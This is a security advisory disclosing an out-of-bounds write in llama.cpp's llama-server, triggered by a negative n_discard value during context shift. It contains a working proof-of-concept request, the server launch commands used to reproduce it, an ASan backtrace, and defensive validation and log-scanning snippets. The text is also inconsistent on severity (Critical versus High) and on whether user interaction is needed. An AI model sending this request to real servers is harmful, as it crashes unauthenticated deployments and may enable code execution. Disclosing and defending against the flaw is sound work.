
Out-of-bounds Write in llama.cpp llama-server

High
ggerganov published GHSA-8947-pfff-2f3c Jan 5, 2026

Package

llama.cpp (ggml-org/llama.cpp)

Affected versions

<= 55d4206c8

Patched versions

None

Description

Summary

Context shift trusts the client-supplied n_discard value without validation. A remote attacker can send a negative value through the public completion endpoints, corrupt the KV cache and text buffers during the shift, and crash the process or pivot to remote code execution (RCE). Severity: Critical.
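The missing check amounts to rejecting any n_discard that is not a non-negative integer. The Python sketch below shows one way to express that check on a decoded request body, for example in a reverse proxy placed in front of llama-server while no patched version exists. The function name n_discard_error is hypothetical and not part of llama.cpp; a fix in the server itself would presumably sit where n_discard is parsed (tools/server/server.cpp:326).

```python
import json
from typing import Any, Mapping, Optional


def n_discard_error(body: Mapping[str, Any]) -> Optional[str]:
    """Return an error message if body["n_discard"] is unsafe, else None.

    Hypothetical pre-filter (e.g. in a reverse proxy in front of
    llama-server); this is not part of llama.cpp.
    """
    if "n_discard" not in body:
        return None  # field absent: nothing to validate
    value = body["n_discard"]
    # JSON true/false decode to bool, which Python treats as a subclass of int.
    if isinstance(value, bool) or not isinstance(value, int):
        return "n_discard must be an integer"
    if value < 0:
        return "n_discard must be non-negative"
    return None


# The PoC's request body is rejected before it reaches the server.
poc_body = json.loads('{"prompt": "seed text", "n_discard": -32}')
print(n_discard_error(poc_body))  # n_discard must be non-negative
```

Rejecting floats and booleans as well as negative integers keeps the filter strict: only values the server can safely treat as a discard count pass through.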

Details

  • Entry points: /completions, /chat/completions, /slots/(resume), and anything else that goes through server_task::params_from_json_cmpl().
  • tools/server/server.cpp:326: n_discard is parsed straight from JSON into slot_params::n_discard with no non-negative check.
  • When the context is full, server_context::update_slots() consumes slot.task->params.n_discard to shift tokens (tools/server/server.cpp:3613 ff.).
  • A negative value causes:
    • llama_memory_seq_rm/add to receive a reversed range and a negative offset, desynchronizing the KV cache.
    • the loop at tools/server/server.cpp:3626-3630 to evaluate new_tokens[i - n_discard] as new_tokens[i + |n_discard|], writing beyond the end of the std::vector.
  • With ASan or the built-in guards enabled, the process aborts (pos_min == -1); with those checks removed, the same path produces deterministic out-of-bounds writes, exactly what an attacker needs for code execution.
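To make the index arithmetic concrete, the following Python sketch models the shift loop as plain integer arithmetic. It assumes, as described above, that the loop runs i from n_keep + n_discard up to the buffer length and copies new_tokens[i] to new_tokens[i - n_discard]. It does not call llama.cpp, the function name out_of_bounds_targets is hypothetical, and it only models cases where n_keep + n_discard is non-negative.

```python
from typing import List


def out_of_bounds_targets(n_tokens: int, n_keep: int, n_discard: int) -> List[int]:
    """List write indices outside [0, n_tokens) for the modeled shift loop.

    Models: for i in [n_keep + n_discard, n_tokens): dst[i - n_discard] = src[i]
    Illustration only; this is not llama.cpp code.
    """
    start = n_keep + n_discard
    if start < 0:
        raise ValueError("model only covers n_keep + n_discard >= 0")
    return [i - n_discard for i in range(start, n_tokens)
            if not 0 <= i - n_discard < n_tokens]


# A positive discard only moves tokens toward the front of the buffer.
print(out_of_bounds_targets(128, 64, 32))   # []
# A negative discard moves them past the end: indices 128..159.
bad = out_of_bounds_targets(128, 64, -32)
print(len(bad), bad[0], bad[-1])            # 32 128 159
```

With n_discard = -32 the destination index is i + 32, so the last 32 iterations of the modeled loop target slots that do not exist in a 128-element buffer.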

PoC

Prerequisite: start the server with context shift enabled (--context-shift). This works for both CPU and GPU builds; the example below uses a CUDA+ASan binary.

  1. Build llama-server with CUDA and ASan (per the standard instructions).
  2. Launch it:

CUDA_LAUNCH_BLOCKING=1 \
ASAN_OPTIONS=abort_on_error=1:detect_leaks=0 \
LSAN_OPTIONS=detect_leaks=0 \
LD_LIBRARY_PATH=/usr/local/cuda/lib64:$LD_LIBRARY_PATH \
build-cuda-asan/bin/llama-server \
  --model /models/DeepSeek-R1-Distill-Qwen-32B-Q2_K.gguf \
  --ctx-size 128 \
  --port 8080 \
  --context-shift

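  3. Issue a malicious request (no authentication needed):
#!/usr/bin/env python3
import requests

resp = requests.post(
    "http://127.0.0.1:8080/completions",
    json={
        "prompt": "seed text",
        "stream": False,
        "cache_prompt": True,
        # Ask for more tokens than the 128-token context holds,
        # so generation fills the context and forces a context shift.
        "n_predict": 512,
        "n_keep": 0,
        # Malicious value: a negative discard count is accepted unchecked.
        "n_discard": -32,
        "temperature": 0.0,
    },
    timeout=60,
)
print(resp.status_code, resp.text[:200])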
  4. The server logs show slot context shift ... n_discard = -32, followed by KV cache inconsistency or ASan out-of-bounds reports. In non-sanitized builds the same path yields silent memory corruption and opens the door to RCE.
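Operators who want to check whether this path has been hit could scan server logs for context-shift lines that report a negative n_discard. This minimal Python sketch assumes only the fragment quoted above (a line containing "context shift" and "n_discard = <integer>"); the exact log format may differ between builds, and the helper name negative_discards is hypothetical.

```python
import re
from typing import Iterable, List

# Matches the "n_discard = <int>" fragment quoted in the advisory.
N_DISCARD_RE = re.compile(r"n_discard\s*=\s*(-?\d+)")


def negative_discards(lines: Iterable[str]) -> List[int]:
    """Return every negative n_discard value reported on a context-shift line."""
    found: List[int] = []
    for line in lines:
        if "context shift" not in line:
            continue  # only context-shift log lines are relevant
        match = N_DISCARD_RE.search(line)
        if match and int(match.group(1)) < 0:
            found.append(int(match.group(1)))
    return found


# Sample line copied from the advisory (the "..." is elided there as well).
sample = ["slot context shift ... n_discard = -32"]
print(negative_discards(sample))  # [-32]
```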

Impact

  • Remote unauthenticated out-of-bounds write leading to crash or arbitrary code execution.
  • Every llama.cpp deployment running the HTTP server with --context-shift (CPU or GPU) is affected.
  • Attacker needs only network access; no credentials or user interaction.

Output

#0  0x00007f0c1219d813 in wait4 () from /lib/x86_64-linux-gnu/libc.so.6
#1  0x0000556d78816cd6 in __interceptor_waitpid ()
#2  0x00007f0c12670177 in ggml_print_backtrace () at /workspace/ggml/src/ggml.c:196
196             waitpid(child_pid, NULL, 0);
#3  0x00007f0c1267067a in ggml_abort (file=<optimized out>, line=<optimized out>, fmt=<optimized out>) at /workspace/ggml/src/ggml.c:230
230             ggml_print_backtrace();
#4  0x0000556d78a71d73 in server_context::update_slots (this=0x7f0c0fa01900) at /workspace/tools/server/server.cpp:3835
3835                                        GGML_ABORT("pos_min == -1, but n_past > 0 - should not happen: https://github.com/ggml-org/llama.cpp/pull/13833#discussion_r2116181237");
#5  0x0000556d7891c8ca in std::function<void ()>::operator()() const (this=0x7f0c0fa03078) at /usr/bin/../lib/gcc/x86_64-linux-gnu/13/../../../../include/c++/13/bits/std_function.h:591
591             return _M_invoker(_M_functor, std::forward<_ArgTypes>(__args)...);
#6  server_queue::start_loop (this=0x7f0c0fa02f58) at /workspace/tools/server/server.cpp:2152
2152                callback_update_slots();
#7  0x0000556d788c97c4 in main (argc=<optimized out>, argv=<optimized out>) at /workspace/tools/server/server.cpp:5753
5753        ctx_server.queue_tasks.start_loop();
[Inferior 1 (process 32778) detached]
[1]    32778 IOT instruction (core dumped)  ASAN_OPTIONS=abort_on_error=1:detect_leaks=0 LSAN_OPTIONS=detect_leaks=0  

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
8.8 / 10

CVSS v3 base metrics

Attack vector: Network
Attack complexity: Low
Privileges required: None
User interaction: Required
Scope: Unchanged
Confidentiality: High
Integrity: High
Availability: High

CVSS v3 base metric definitions

Attack vector: More severe the more remote (logically and physically) an attacker can be while still exploiting the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
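The overall score follows from the vector string above through the CVSS v3.1 base-score equations. The Python sketch below implements those equations, including the specification's Roundup function, as an illustration; it is not FIRST's reference calculator, and the names WEIGHTS, PR_WEIGHTS, roundup, and base_score are hypothetical.

```python
import math

# CVSS v3.1 base-metric weights (FIRST specification).
WEIGHTS = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "UI": {"N": 0.85, "R": 0.62},
    "C": {"H": 0.56, "L": 0.22, "N": 0.0},
    "I": {"H": 0.56, "L": 0.22, "N": 0.0},
    "A": {"H": 0.56, "L": 0.22, "N": 0.0},
}
# Privileges Required weights depend on Scope (Unchanged / Changed).
PR_WEIGHTS = {
    "U": {"N": 0.85, "L": 0.62, "H": 0.27},
    "C": {"N": 0.85, "L": 0.68, "H": 0.5},
}


def roundup(x: float) -> float:
    """CVSS v3.1 Roundup: smallest one-decimal value >= x, avoiding float drift."""
    i = round(x * 100000)
    if i % 10000 == 0:
        return i / 100000.0
    return (math.floor(i / 10000) + 1) / 10.0


def base_score(vector: str) -> float:
    """Compute the base score of a 'CVSS:3.1/AV:../...' vector string."""
    parts = dict(p.split(":") for p in vector.split("/")[1:])
    scope = parts["S"]
    iss = 1 - ((1 - WEIGHTS["C"][parts["C"]])
               * (1 - WEIGHTS["I"][parts["I"]])
               * (1 - WEIGHTS["A"][parts["A"]]))
    if scope == "U":
        impact = 6.42 * iss
    else:
        impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15
    exploitability = (8.22 * WEIGHTS["AV"][parts["AV"]] * WEIGHTS["AC"][parts["AC"]]
                      * PR_WEIGHTS[scope][parts["PR"]] * WEIGHTS["UI"][parts["UI"]])
    if impact <= 0:
        return 0.0
    if scope == "U":
        return roundup(min(impact + exploitability, 10))
    return roundup(min(1.08 * (impact + exploitability), 10))


print(base_score("CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"))  # 8.8
```

Changing UI:R to UI:N in the same vector gives 9.8 with this sketch, so the "User interaction: Required" rating accounts for a full point of difference.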

CVE ID

CVE-2026-21869

Weaknesses

Out-of-bounds Write (CWE-787)

The product writes data past the end, or before the beginning, of the intended buffer.

Credits